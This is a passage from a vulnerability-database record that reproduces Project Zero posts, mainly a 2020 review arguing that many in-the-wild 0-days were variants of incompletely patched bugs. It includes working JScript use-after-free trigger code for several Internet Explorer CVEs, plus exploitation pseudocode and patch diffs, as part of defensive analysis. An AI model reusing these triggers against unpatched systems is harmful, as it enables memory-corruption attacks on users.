[CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \\- Windows CSRSS Vulnerability (fixed April 2020)\n\nWe understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the \"fast\" or \"slow\" exploitation paths. \n\nThe Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.\n\nThe posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:\n\n * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,\n * A deep look into the bug class of one of the Chrome exploits, and\n * An in-depth teardown of the Android post-exploitation code.\n\nIn addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. \n\nExploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.\n\nWe recommend reading the posts in the following order:\n\n 1. Introduction (this post)\n 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\n 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)\n 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)\n 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)\n 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)\n\nThis is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIntroducing the In-the-Wild Series\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "href": "https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T19:23:21", "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\n\nProduct\n\n| \n\nVulnerability exploited in-the-wild\n\n| \n\nVariant of... \n \n---|---|--- \n \nMicrosoft Internet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2018-8653* CVE-2019-1367* CVE-2019-1429* \n \nMozilla Firefox\n\n| \n\nCVE-2020-6820\n\n| \n\nMozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) \n \nGoogle Chrome\n\n| \n\nCVE-2020-6572\n\n| \n\nCVE-2019-5870\n\nCVE-2019-13695 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2019-0880* \n \nGoogle Chrome/Freetype\n\n| \n\nCVE-2020-15999\n\n| \n\nCVE-2014-9665 \n \nApple Safari\n\n| \n\nCVE-2020-27930\n\n| \n\nCVE-2015-0093 \n \n* vulnerability was also exploited in-the-wild in previous years \n \n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i < 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i < 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i < 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a < 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution patch for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty && mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). \n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. \n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. \n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize <= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). [The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. \n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics->width = (FT_Int)imgWidth;\n\nmetrics->height = (FT_Int)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map->rows * map->pitch; <- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics->width = (FT_UShort)imgWidth;\n\nmetrics->height = (FT_UShort)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] \n \n--- \n \nTo summarize: \n\n * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.\n * CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.\n\nA fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow. \n\n## Apple Safari CVE-2020-27930\n\nThis vulnerability is slightly different than the rest in that while it\u2019s still a variant, it\u2019s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there\u2019s no true \u201cupstream\u201d. However when vulnerabilities were reported in Microsoft\u2019s, Apple\u2019s, or Adobe\u2019s fork, there is a possibility (though no guarantee) that it was also in the others.\n\nCVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft\u2019s implementation of Adobe\u2019s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack. \n\n[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple\u2019s implementation of Adobe\u2019s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write. \n\nSix years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There\u2019s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.\n\n# Exploited 0-days not properly fixed\u2026 \ud83d\ude2d\n\nThree vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor. \n\nProduct\n\n| \n\nVulnerability that was exploited in-the-wild\n\n| \n\n2nd patch \n \n---|---|--- \n \nInternet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2020-0968 \n \nGoogle Chrome\n\n| \n\nCVE-2019-13764*\n\n| \n\nCVE-2020-6383 \n \nMicrosoft Windows\n\n| 